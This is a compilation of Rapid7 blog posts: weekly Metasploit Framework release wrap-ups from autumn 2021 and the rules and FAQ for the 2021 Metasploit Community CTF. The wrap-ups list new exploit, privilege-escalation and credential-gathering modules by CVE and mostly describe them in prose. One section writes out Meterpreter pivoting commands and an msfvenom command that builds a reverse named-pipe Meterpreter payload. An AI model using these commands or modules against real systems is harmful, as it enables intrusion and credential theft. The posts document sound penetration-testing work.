  • Jetty WEB-INF File Disclosure by Mayank Deshmukh, cangqingzhe, charlesk40, h00die, and lachlan roberts, which exploits CVE-2021-28164 – This adds an auxiliary module that retrieves sensitive files from Jetty versions 9.4.37.v20210219, 9.4.38.v20210224, 9.4.37-9.4.42, 10.0.1-10.0.5, and 11.0.1-11.0.5 . Protected resources behind the WEB-INF path can be accessed due to servlet implementations improperly handling URIs containing certain encoded characters.
  • Microsoft Azure Active Directory Login Enumeration by Matthew Dunn – k0pak4 – This adds an auxiliary scanner module that leverages Azure Active Directory authentication flaw to enumerate usernames without generating log events. The module also supports brute-forcing passwords against this tenant.
  • Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE by Erik Wynter and Erik de Jong, which exploits CVE-2020-16152 – This change adds a new module to exploit LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user.
  • Sitecore Experience Platform (XP) PreAuth Deserialization RCE by AssetNote and gwillcox-r7, which exploits CVE-2021-42237 – This adds an exploit for CVE-2021-42237 which is an unauthenticated RCE within the Sitecore Experience Platform. The vulnerability is due to the deserialization of untrusted data submitted by the attacker.

Enhancements and features

  • #15796 from zeroSteiner – Support for pivoted SSL server connections as used by capture modules and listeners has been added to Metasploit. The support works for both Meterpreter sessions and SSH sessions.
  • #15851 from smashery – Update several modules and core libraries so that now when sending HTTP requests that include user agents, the user agents are modernized, and are randomized at msfconsole start time. Users can also now request Rex to generate a random user agent from one of the ones in the User Agent pool should they need a random user agent for a particular module.
  • #15862 from smashery – Updates have been made to Linux Meterpreter libraries to support expanding environment variables in several different commands. This should provide users with a smoother experience when using environment variables in commands such as cd, ls, download, upload, mkdir and similar commands.
  • #15867 from h00die – The example modules have been updated to conform to current RuboCop rules and to better reflect recent changes in the Metasploit Framework coding standards, as well as to better showcase various features that may be needed when developing exploits.
  • #15878 from smashery – This fixes an issue whereby tab-completing a remote folder in Meterpreter would append a space onto the end. This change resolves that by not appending the space if we’re potentially in the middle of a tab completion journey, and adding a slash if we’ve completed a directory, providing a smoother tab completion experience for users.

Bugs fixed

  • #15875 from smashery – This fixes an issue with the reverse Bash command shell payloads where they would not work outside of the context of bash.
  • #15879 from jmartin-r7 – Updates batch scanner modules to no longer crash when being able to unable to correctly calculate a scanner thread’s batch size

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Announcing the 2021 Metasploit Community CTF

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2021/11/16/announcing-the-2021-metasploit-community-ctf/

Announcing the 2021 Metasploit Community CTF

It’s time for another Metasploit community CTF! Last year’s beginner-friendly CTF attracted a wider range of audiences and skill levels than in previous years, so we’re replicating our previous game architecture. Players will attack a single Linux target, we’ve spread prizes out across 15 teams, and the Metasploit Framework teams have devised a variety of challenges that aim to help infosec newcomers build practical skills. While there are some challenges that are intended to be a bit more difficult, we’ve designed the majority of them for beginner audiences. Hint: We’ve arranged challenges by port number according to difficulty this year. The higher the port number, the harder the challenge. If you want to start out with easier challenges, start by targeting services that run on lower port numbers.

As always, teams are encouraged! There is no cap on the number of players who can join a team. Read on for full competition details, and join the #metasploit-ctf channel on Slack to start building your team.

Big thanks to TryHackMe and CTFd for powering this year’s game!

TL;DR overview

There are 1,000 team spots available; both individuals and teams of multiple members are allowed. There is no limit on the number of players who can be on a team. Please note: Those playing as a team only need to register ONE team upon signup. Help us make the competition accessible to as many players as possible by organizing with your fellow team players ahead of time and creating only a single team for all of you. If others want to join your team later, that’s no problem. See the FAQ at the end of this post for details.

Important dates (all times in US Central Standard Time):

  • Initial team registration opens for the first 750 teams on Monday, November 22, 2021 at 2:00 PM CST (UTC-6).
  • CTF game play begins on Friday, December 3, 2021 at 11:00 AM CST (UTC-6). When the CTF officially begins, we will open registration for an additional 250 teams.
  • The CTF ends on Monday, December 6, 2021, at 11:00 AM CST (UTC-6).

Our goal in putting on CTFs is to enable relationship building and knowledge sharing across the security community. To further emphasize community partnership and camaraderie over purely monetary gain, we’ve increased the value of CTF prizes in the past few years but spread those prizes out over many teams.

  • The 15 teams with the highest point totals when game play ends will receive Amazon Gift Cards (only one per team!).
  • We’re partnering with TryHackMe to offer other prizes to the 3 teams that achieve the highest point total the fastest! See the prize section at the end of this post for details.

You can see results and statistics from the last Metasploit CTF here.

Questions?

To report technical issues during the competition or to discuss play with your teammates and community members, join us in the #metasploit-ctf channel on Slack. The Metasploit team will be occasionally available on Slack in case of technical issues, but please be advised that Rapid7 staff members will not respond to DMs with requests for hints or help with flags or MD5 hash submission.

A few notes on the technicalities of game play:

  • You must use a valid email for registration. You’ll need to verify your email upon signup; email is also how we communicate with winners.
  • We’ve run this CTF for several years now, and we’ve yet to encounter an actual technical issue with a flag (other than the occasional bit of latency, which we try to avoid by being thoughtful about challenge development). If your MD5 hash submission isn’t being accepted, it is because the hash is incorrect. Keep trying! There is no penalty for wrong answers.
  • The scoreboard is not a target. Nothing except the official CTF target is a target. Please don’t attack anything except the target box.
  • When game play starts, provisioning is first come, first served. It may take a few minutes. Be patient! If you’ve been waiting for more than half an hour for your network to be provisioned, you can reach out to us on Slack.
  • Please, no spoilers in Slack channels or other public places. Everyone learns at their own pace, so don’t ruin the game for others. We may kick you out of Slack if you post flag spoilers. Harassment of other players and community members won’t be tolerated.
  • Metasploit Slack messages archive automatically after a certain threshold (this is just how our implementation of Slack works). If you’re worried about continuous access to your conversations, you may want to hold them outside of Metasploit’s Slack channel.
  • Higher port numbers signify more advanced challenges.

2021 Metasploit Capture the Flag: Official rules

No purchase is necessary to participate. Only the first 1,000 registrants (teams or individuals) will be able to participate. For further information, see the full Contest Terms here.

To enter

Starting Monday, November 22, 2021 at 2:00 PM CST (UTC-6),  the first 750 teams can register here. On Friday, December 3, 2021, at 11:00 AM CST (UTC-6) the CTF will begin. An additional 250 teams can register here when game play begins. Please note: Only ONE team needs to be created for all players. Teammates can and should share their team credentials (and/or their links to invite new players). Please ensure you enter your email address correctly when registering: You will need to verify your email upon registration, and we will use email to communicate with winners about prizes.

Play starts Friday, December 3, 2021 at 11:00 AM CST (UTC-6). When play starts, players should use the instructions on the Control Panel to connect to the Kali Linux jump box. From there, players can attack the vulnerable target environment to find flags. All flags are PNG images.

When a flag is found, players should submit the MD5 hash to the Challenges section of the scoreboard. If the MD5 hash is correct, points will be awarded. There is no penalty for wrong answers.

The competition will open on Friday, December 3, 2021 at 11:00 AM CST (UTC-6) and close on Monday, December 6, 2021, at 11:00 AM CST (UTC-6). The Contestants with the fifteen (15) highest point totals at the end of the contest will each receive one (1) $100 USD Amazon gift card. In addition, the three (3) Contestants with the highest point total at the end of the Contest will also receive the prizes listed below and will be announced in an official blog post following the Contest. In the event of a tie, the Contestant who reached that score first will be the winner.

You may participate as an individual or as a team. However, only ONE cash prize can be awarded for each winning team; therefore, if you are participating as a team, please be aware that we cannot offer cash prizes to each team member. (Any further method used to determine who among your teammates takes home the CTF spoils is up to you. We hear thumb wars and structured rock/paper/scissors competitions are effective.)

Prizes

Only the prizes listed below will be awarded as part of the competition. Prizes are not transferable or redeemable for cash. Rapid7 reserves the right to make equivalent substitutions as necessary, due to circumstances not under its control. Please allow several weeks for delivery of any prize.

To reiterate, only ONE cash prize can be awarded for each winning team; therefore, if you are participating as a team, please be aware that we will not offer cash prizes to each team member. How you divide spoils among your team is up to you!

Place Prize ARV
1st $100 Amazon Gift Card (1), ($20) Two Month THM Premium Voucher per team member* + ($60) Throwback Voucher per team member* 180 USD
2nd $100 Amazon Gift Card (1), ($20) Two Month THM Premium Voucher per team member* + ($20) Swag Voucher per team member* 140 USD
3rd $100 Amazon Gift Card (1), ($10) One Month THM Premium Voucher per team member* 110 USD
4th to 15th $100 Amazon Gift Card (1) 100 USD

*TryHackMe vouchers will be provided for up to 15 members per team

Contestants with the highest point total at the end of the Contest will also be announced in an official blog post following the Contest.

FAQ

What’s the difference between an account and a team? Anyone can create an account, and accounts are unlimited. Teams, on the other hand, are limited to 1,000. To actually play in the CTF, you need to belong to a team — either by yourself or with your teammates.

How do teams work? When CTF registration opens on November 22, you’ll see a page that guides you through creating an account, verifying your email, and finally, asking you to either create a new team OR join an existing team. If you already have a team you know would like to play together, designate ONE team captain to create your team and a team password. Team captains (or whoever created the team) can then share the team password with all team members. Note that a team password is different from an account password.

There is also a new feature this year that allows team captains the option to share an invite link instead of (or in addition to) a password, so a new user can just follow that link to be automatically added to a team (once they have a valid account).

Please note: Team captains and team members should ONLY share team invitation links or team passwords with people they trust.

What if I want to join a team later, or if someone else wants to join my team later? That’s OK! To join someone else’s team, ask them for their team name and password, OR their team invite link. You can then create an account if you don’t already have one (again, accounts are unlimited; it’s only teams that are limited) and input their team name and credentials. If you’d like someone to join your team, you can simply share your team name and password with them.

I already created or joined a team, but I want to join a different one. What do I do? If you are the team captain (you’re the one who created the team), you can disband the team by clicking the trash can icon on your team settings page. This will help out the community by freeing up a team registration slot for someone else. If you’re not the team captain, you can also leave a team by clicking the arrow icon on your team settings page. Both options are available at any point before the contest starts on December 3. Please note that teams cannot be adjusted once play has started.

Is there a maximum number of players allowed on a team? Nope! Feel free to team up with  as many friends and strangers as you like — just remember that only one Amazon Gift Card can be awarded to each winning team, and TryHackMe vouchers are limited to a maximum of 15 per winning team. How you divide prizes if you win is totally up to you.

How do I connect to my CTF environment? Starting Friday, December 3, 2021, at 11:00 AM CST (UTC-6), you can log in here and follow the directions on your Control Panel to access the CTF environment.

Do I need to use Metasploit to solve the CTF challenges? No. Using Metasploit is an option for some challenges, but the CTF was not engineered to be Metasploit-specific.

I am not receiving points when I submit my flag. What’s wrong? You are not submitting the correct MD5 hash. This means you still have some work to do to solve the challenge correctly. Keep trying! There is no penalty for wrong answers.

Can you give me a hint about $FLAG? No, sorry. That would spoil the fun!

I’m having technical difficulties or I think I’ve found a bug! Can I DM someone for help? In general, Rapid7 staff will not respond to DMs requesting help with flag discovery, exploitation, or anything else related to the workings of the game. If you think you have discovered a bug in the CTF environment that is affecting your ability to play, you can reach out to a designated admin in the #metasploit-ctf channel on Slack, but we strongly recommend you check the pinned Slack messages to see if your question has already been addressed. If we think the behavior you’re experiencing is unexpected, we’ll respond and take a look, but in general, you should expect to proceed without input or attention from us.

My target or jump box reverted! What happened? Either you or one of your teammates clicked the “Revert” button from the control panel. Your boxes will not revert on their own, and Rapid7 staff will not revert boxes for you unless specifically requested.

Grab your friends, grab your parents, meet new folks, and good luck!

Join our community CTF!

Registration opens Monday, November 22

Metasploit Wrap-Up

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/11/12/metasploit-wrap-up-138/

Callback Hell

Metasploit Wrap-Up

Metasploit has now added an exploit module for CVE-2021-40449, a Windows local privilege escalation exploit caused by a use-after-free during the NtGdiResetDC callback in vulnerable versions of win32k.sys. This module can be used to escalate privileges to those of NT AUTHORITY\SYSTEM. The module should work against Windows 10 x64 build 14393 and 17763, but it should also work against older versions of Windows 10. Note that this exploit may not always work the first time, and may require an additional run to succeed.

OMIGOD it’s LPE

As a continuation to the recently landed OMIGOD RCE module, Spencer McIntyre has contributed a new local privilege escalation module for CVE-2021-38648, which is an authentication bypass within Microsoft’s (OMI) management interface versions less than 1.6.8-1. This vulnerability must be leveraged locally and can be exploited in the default configuration. Exploitation results in OS command execution as the root user.

Named Pipe Pivoting

This week dwelch-r7 fixed a regression issue in Meterpreter’s named pipe pivoting support. This relatively unknown feature was initially added by community contributor OJ and allows users to pivot additional Meterpreter sessions through a compromised host using named pipes over SMB.

As a quick demonstration, users can create a named pipe on a compromised Windows host through an existing Meterpreter session:

sessions -i -1
pivot add -t pipe -l $smb_host_ip -n mypipe -a x64 -p windows

Then verify the pivot was created successfully:

meterpreter > pivot list

Currently active pivot listeners
================================

    Id                                URL                            Stage
    --                                ---                            -----
    c134bb9f27dc4089b2f56b3ad25c4970  pipe://192.168.222.155/mypipe  x64/windows

Now generate a new payload which will connect to the compromised host’s named pivot over SMB:

msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=$smb_host_ip PIPENAME=mypipe -o pipe.exe -f exe -a x64

Execution of this new payload will attempt to connect to the compromised Windows host, resulting in a new session in msfconsole, which can be verified with the sessions command:

Metasploit Wrap-Up

New module content (4)

  • WordPress Plugin Automatic Config Change to RCE by Jerome Bruandet and h00die – This adds an auxiliary module that leverages an unauthenticated arbitrary WordPress options change vulnerability
    in the Automatic (wp-automatic) plugin version 3.53.2 and below. The module enables user registration, sets the default user role to admin and creates a new privileged user with the provided email address.
  • BillQuick Web Suite txtID SQLi by Caleb Stewart and h00die, which exploits CVE-2021-42258 – This adds an auxiliary module that exploits an unauthenticated sql injection vulnerability in BillQuick Web Suite versions before v22.0.9.1.
  • Microsoft OMI Management Interface Authentication Bypass by Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits CVE-2021-38648 – This adds a local exploit module that targets versions less than 1.6.8-1 of Microsoft’s Open Management Infrastructure (OMI) software. Issuing a command execution request against the local socket with the authentication handshake omitted can result in code execution as the root user.
  • Win32k NtGdiResetDC Use After Free Local Privilege Elevation by Boris Larin, Costin Raiu, Grant Willcox, IronHusky, KaLendsi, Red Raindrop Team of Qi’anxin Threat Intelligence Center, and ly4k, which exploits CVE-2021-40449 – Adds a module for CVE-2021-40449 aka CallbackHell, a Windows local privilege escalation exploit caused by a use after free during the NtGdiResetDC callback in vulnerable versions of win32k.sys.

Enhancements and features

  • #15829 from AlanFoster – This makes a couple of improvements to the Kubernetes Exec module to handle slow instances more gracefully by using a configurable exponential back off.
  • #15840 from smashery – Changes an error message that was preventing the DCSync operation from running as SYSTEM to a warning to allow it to run. This fixes a case where the computer account has the necessary privileges to complete the operations which is the case when it is a domain controller.
  • #15846 from smashery – The download command has been updated so that now supports tab completion for file paths and file names.
  • #15859 from smashery – Improves the Meterpreter tab completion functionality on case insensitive filesystems (such as Windows).

Bugs fixed

  • #15818 from zeroSteiner – Fixes an edgecase in the Kubernetes exec module which led to sessions dying when performing partial websocket reads

  • #15820 from dwelch-r7 – Fixes a regression issue in Meterpreter’s named pipe pivoting support

  • #15838 from uhei – Fixes a regression error in auxiliary/scanner/sap/sap_router_portscanner which caused this module to crash when validating host ranges

  • #15845 from smashery – This updates Meterpreter to check if it’s running as SYSTEM before attempting to escalate as part of getsystem. This allows it to state that it’s already running as SYSTEM instead of displaying an error message that no escalation technique worked.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2021/11/05/metasploit-wrap-up-137/

GitLab RCE

Metasploit Wrap-Up

New Rapid7 team member jbaines-r7 wrote an exploit targeting GitLab via the ExifTool command. Exploiting this vulnerability results in unauthenticated remote code execution as the git user. What makes this module extra neat is the fact that it chains two vulnerabilities together to achieve this desired effect. The first vulnerability is in GitLab itself that can be leveraged to pass invalid image files to the ExifTool parser which contained the second vulnerability whereby a specially-constructed image could be used to execute code. For even more information on these vulnerabilities, check out Rapid7’s post.

Less Than BulletProof

This week community member h00die submitted another WordPress module. This one leverages an information disclosure vulnerability in the WordPress BulletProof Security plugin that can disclose user credentials from a backup file. These credentials could then be used by a malicious attacker to login to WordPress if the hashed password is able to be cracked in an offline attack.

Metasploit Masterfully Manages Meterpreter Metadata

Each Meterpreter implementation is a unique snowflake that often incorporates API commands that others may not. A great example of this are all the missing Kiwi commands in the Linux Meterpreter. Metasploit now has much better support for modules to identify the functionality they require a Meterpreter session to have in order to run. This will help alleviate frustration encountered by users when they try to run a post module with a Meterpreter type that doesn’t offer functionality that is needed. This furthers the Metasploit project goal of providing more meaningful error information regarding post module incompatibilities which has been an ongoing effort this year.

New module content (3)

  • WordPress BulletProof Security Backup Disclosure by Ron Jost (Hacker5preme) and h00die, which exploits CVE-2021-39327 – This adds an auxiliary module that leverages an information disclosure vulnerability in the BulletproofSecurity plugin for WordPress. This vulnerability is identified as CVE-2021-39327. The module retrieves a backup file, which is publicly accessible, and extracts user credentials from the database backup.
  • GitLab Unauthenticated Remote ExifTool Command Injection by William Bowling and jbaines-r7, which exploits CVE-2021-22204 and CVE-2021-22205 – This adds an exploit for an unauthenticated remote command injection in GitLab via a separate vulnerability within ExifTool. The vulnerabilities are identified as CVE-2021-22204 and CVE-2021-22205.
  • WordPress Plugin Pie Register Auth Bypass to RCE by Lotfi13-DZ and h00die – This exploits an authentication bypass which leads to arbitrary code execution in versions 3.7.1.4 and below of the WordPress plugin, pie-register. Supplying a valid admin id to the user_id_social_site parameter in a POST request now returns a valid session cookie. With that session cookie, a PHP payload as a plugin is uploaded and requested, resulting in code execution.

Enhancements and features

  • #15665 from adfoster-r7 – This adds additional metadata to exploit modules to specify Meterpreter command requirements. Metadata information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn’t support the required command functionality.
  • #15782 from k0pak4 – This updates the iis_internal_ip module to include coverage for the PROPFIND internal IP address disclosure as described by CVE-2002-0422.

Bugs fixed

  • #15805 from timwr – This bumps the metasploit-payloads version to include two bug fixes for the Python Meterpreter.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Grant Willcox original https://blog.rapid7.com/2021/10/29/metasploit-wrap-up-136/

OMIGOD It’s RCE

Metasploit Wrap-Up

We are excited to announce that we now have a module for the OMIGOD vulnerability that exploits CVE-2021-38647 courtesy of our very own Spencer McIntyre! Successful exploitation will allow an unauthenticated attacker to gain root level code execution against affected servers. Given that this has seen exploitation in the wild by the Mirai botnet, we hope you’re patched, lest your servers decide to join the zombie horde this Halloween!

Sophos Contributes to the RCE Pile

Continuing the trend of unauthenticated RCE exploits that grant root level code execution, this week we also have an exploit for CVE-2020-25223, an unauthenticated RCE within the Sophos UTM WebAdmin service. Whilst we haven’t yet seen exploitation in the wild of this bug, this is definitely one to patch given its severity. Stay frosty folks!

Guess Who’s Back, Back Again, Apache’s Back, Tell a Friend

Whilst not a marshalling bug (I’m sorry, it’s Halloween some puns are needed), community contributors Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), have added a scanner and exploit for CVE-2021-41773 and CVE-2021-42013, which was based off of work from RootUp, ProjectDiscovery, and HackerFantastic. Path traversal vulnerabilities are relatively easy to exploit, and this got a lot of attention in the news since it’s been a long time since Apache has seen a reliable RCE exploit against it. This is definitely one to patch if you’re running any Apache servers. Successful exploitation will result in remote code execution as the user running the Apache server.

New module content (6)

  • Squid Proxy Range Header DoS by Joshua Rogers, which exploits CVE-2021-31806 and CVE-2021-31807 – This adds a module that leverages CVE-2021-31806 and CVE-2021-31807 to trigger a denial of service condition in vulnerable Squid proxy servers.
  • Apache 2.4.49/2.4.50 Traversal RCE scanner by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits CVE-2021-41773 and CVE-2021-42013 – This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
  • Sophos UTM WebAdmin SID Command Injection by wvu and Justin Kennedy, which exploits CVE-2020-25223 – This adds an exploit for CVE-2020-25223 which is an unauthenticated RCE within the Sophos UTM WebAdmin service. Exploitation results in OS command execution as the root user.
  • Microsoft OMI Management Interface Authentication Bypass by wvu, Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits CVE-2021-38647 – We added an unauthenticated RCE exploit for Microsoft OMI "OMIGOD" CVE-2021-38647. Successful exploitation grants code execution as the root user.
  • Apache 2.4.49/2.4.50 Traversal RCE by Ash Daulton, Dhiraj Mishra, and mekhalleh (RAMELLA Sébastien), which exploits CVE-2021-41773 and CVE-2021-42013 – This adds both a scanner and exploit module for the two recent path traversal vulnerabilities in the apache2 HTTP server. The RCE module requires mod_cgi to be enabled but can be exploited remotely without any authentication. These vulnerabilities are identified as CVE-2021-41773 and CVE-2021-42013.
  • Browse the session filesystem in a Web Browser by timwr – This adds a post module that allows the user to view the Meterpreter sessions filesystem via a locally hosted web page.

Enhancements and features

  • #15681 from smashery – This adds support for reverse port forwarding via established SSH sessions.
  • #15778 from k0pak4 – This PR adds documentation for the http trace scanner.
  • #15788 from zeroSteiner – When generating a Powershell command payload would exceed the maximum length allowed to successfully execute, gracefully fall back to omitting an ASMI bypass.
  • #15803 from k0pak4 – This adds f5_bigip_virtual_server scanner documentation.

Bugs fixed

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest version of Metasploit Framework. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/

We just couldn’t contain ourselves!

Metasploit Wrap-Up

This week we’ve got two Kubernetes modules coming at you from adfoster-r7 and smcintyre-r7. First up is an enum module auxiliary/cloud/kubernetes/enum_kubernetes that’ll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module exploit/multi/kubernetes/exec (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.

Atlassian Confluence WebWork OGNL Injection gets Windows support

You might remember Confluence Server CVE-2021-26084 making an appearance in a wrap-up last month, and it’s back! Rapid7’s own wvu-r7 has updated his Confluence Server exploit to support Windows targets.

New module content (2)

  • Kubernetes Enumeration by Spencer McIntyre and Alan Foster – This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.
  • Kubernetes authenticated code execution by Spencer McIntyre and Alan Foster – Adds a new exploit/multi/kubernetes/exec module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host’s file system when possible.

Enhancements and features

  • #15732 from dwelch-r7 – Adds terminal size synchronisation for fully interactive shells against Linux environments with shell -it. This functionality is behind a feature flag and can be enabled with features set fully_interactive_shells true.
  • #15769 from wvu-r7 – Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.
  • #15773 from adfoster-r7 – Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit’s Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.

Bugs fixed

  • #15760 from adfoster-r7 – Fixes an issue when attempting to store JSON loot, where the extension was always being set to bin instead of json.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2021/10/15/metasploit-wrap-up-134/

An Especially Spooky Season for Moodle

Metasploit Wrap-Up

This release has not one, two, or three, but FOUR authenticated Moodle exploit modules, or should I say moodules? H00die comes through again with not just modules, but also an artisanal, bespoke library to support further work. Two target the spell check functions in Moodle, one is a shell upload using administrative credentials, and one allows teachers to get ahead by declaring themselves administrators!

More Information on Forwarded Sessions and Jobs

To get through networks, sometimes red teamers need to connect sessions and forward traffic through a “red network” of hosts to gain access to a target of interest on an interior network. Smashery has added features to the sessions and jobs information reporting that reflects the status of a forwarded connection and which sessions it is using for its connection. This helps users keep track of an already tricky [or treaty] situation juggling sessions and forwarded connections.

New module content (4)

Enhancements and features

  • #15706 from smashery – The reverse shell handlers in Metasploit have been updated. When catching a shell via a route that goes through another existing session, Metasploit will now note which session the new session originated from. This helps users determine how shells were obtained when they use an existing session to acquire another session within a target’s network. Additional information has been applied to job information which provides users with more clarity when looking at jobs.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

[Modified] Image credit https://commons.wikimedia.org/wiki/File:Halloween_Jack-o’-lantern.jpg

Metasploit Wrap-Up

Post Syndicated from Simon Janusz original https://blog.rapid7.com/2021/10/08/metasploit-wrap-up-133/

Telemetry is for gathering data, not executing commands as root, right?…

Metasploit Wrap-Up

This week’s highlight is a new exploit module by our own wvu for VMware vCenter Server CVE-2021-22005, a file upload vuln that arises from a flaw in vCenter’s analytics/telemetry service, which is enabled by default. Attackers with network access to port 443 can upload a specially crafted file, after which commands can be executed as the root user without prior authentication. As usual, this latest vCenter Server vulnerability was exploited in the wild quickly after details were released. See Rapid7’s full technical analysis in AttackerKB.

Good ol’ Netfilter

This week’s release also includes a privilege escalation module for a Linux kernel vulnerability in Netfilter that lets you get a root shell through an out-of-bounds write. The vulnerability was discovered by Andy Nguyen and has been present in the Linux kernel for the past 15 years. The module currently supports 18 versions of the Ubuntu kernel ranging between 5.8.0-23 to 5.8.0-53 thanks to bcoles, and there are plans to add further support for kernel versions 4.x in the future, once an ROP chain for said version is created.

New module content (3)

Enhancements and features

  • #15735 from jaydesl – Fixes a Rails 6 deprecation warning when a user ran db_disconnect in msfconsole
  • #15740 from h00die – Several improvements have been made to the Ghostcat module to align it with recent standards changes that the team has made and to ensure its documentation is more descriptive.
  • #15750 from jmartin-r7 – Improves Ruby 3.0.2 support on Windows

Bugs fixed

  • #15729 from ErikWynter – This fixes a bug in the PrintNightmare check method where if an RPC function returns a value that can’t be mapped to a Win32 error code, the module would crash.
  • #15730 from adfoster-r7 – The check method for the Gitea Git hooks RCE module has been updated to correctly handle older versions of Gitea and report their exploitability as unknown vs reporting the target as not running Gitea.
  • #15737 from adfoster-r7 – A bug has been fixed whereby action wasn’t correctly being set when using the action name as a command. action should now hold the right value when using the action name as a command.
  • #15745 from bwatters-r7 – A bug has been fixed in tools/dev/msftidy.rb whereby if the Notes section was placed before the References section, then msftidy would end up not checking the References section and would therefore state the module didn’t have a CVE reference, even when it did.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erran Carey original https://blog.rapid7.com/2021/10/01/metasploit-wrap-up-132/

Credential gatherers, mix-ins, oh my!

Metasploit Wrap-Up

We’re excited that Metasploit now includes support for 28 related post modules for gathering credentials based on the PackRat toolset. This is a continuation of #5433, #11700, and #11719. It was developed by community contributors Kazuyoshi Maruta, Daniel Hallsworth and Barwar Salim M, for their final year projects at Leeds Beckett University with guidance, code clean-up and some additions by Z. Cliffe Schreuders.

We thank these community contributors for their months of effort and patience while getting so many modules through the code review process.

Netgear PNPX_GetShareFolderList Authentication Bypass

This auxiliary module exploits an authentication bypass in a range of different Netgear router models and firmware versions. The module leverages this vulnerability to log in as the admin user and then achieves a telnet session as root through the auxiliary/scanner/telnet/telnet_login module.

Read more about the SSD Netgear D7000 authentication bypass advisory here.

New module content (30)

  • Netgear PNPX_GetShareFolderList Authentication Bypass by Grant Willcox and Unknown – The auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass module exploits an authentication bypass in various Netgear router models running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The module leverages the vulnerability to log in as the admin user and then achieves a telnet session as the root user through the auxiliary/scanner/telnet/telnet_login module.
  • ECU Hard Reset by Jay Turla – Adds a new ecu_hard_reset hardware module which performs a hard reset in the ECU Reset Service Identifier (0x11)
  • 28 "PackRat" credential gatherers by Barwar Salim M, Daniel Hallsworth, Kazuyoshi Maruta (@KazuCyber), and Z. Cliffe Schreuders (@cliffe) – This pull request adds 28 post-exploitation modules, based on a common mixin, known as PackRat, which gathers file and information artifacts from end users’ systems.
    • Aim credential gatherer
    • Chrome credential gatherer
    • Comodo credential gatherer
    • Coolnovo credential gatherer
    • Digsby credential gatherer
    • Flock credential gatherer
    • Gadugadu credential gatherer
    • ICQ credential gatherer
    • Ie credential gatherer
    • Incredimail credential gatherer
    • KakaoTalk credential gatherer
    • Kmeleon credential gatherer
    • LINE credential gatherer
    • Maxthon credential gatherer
    • Miranda credential gatherer
    • Opera credential gatherer
    • Operamail credential gatherer
    • Postbox credential gatherer
    • QQ credential gatherer
    • Safari credential gatherer
    • Seamonkey credential gatherer
    • Srware credential gatherer
    • Tango credential gatherer
    • Thunderbird credential gatherer
    • Tlen credential gatherer
    • Viber credential gatherer
    • Windows Live Mail credential gatherer
    • Xchat credential gatherer

Enhancements and features

  • #15441 from bf9114 – This change extends the Meterpreter search functionality by adding the ability to search by modified dates across all supported Meterpreter platforms. This allows a user to quickly find files on a target system that has been modified recently, or within a specific date range.
  • #15594 from h00die – This adds options to the wordpress_scanner that enables the user to only scan for wordpress themes or plugins that Metasploit has modules for.
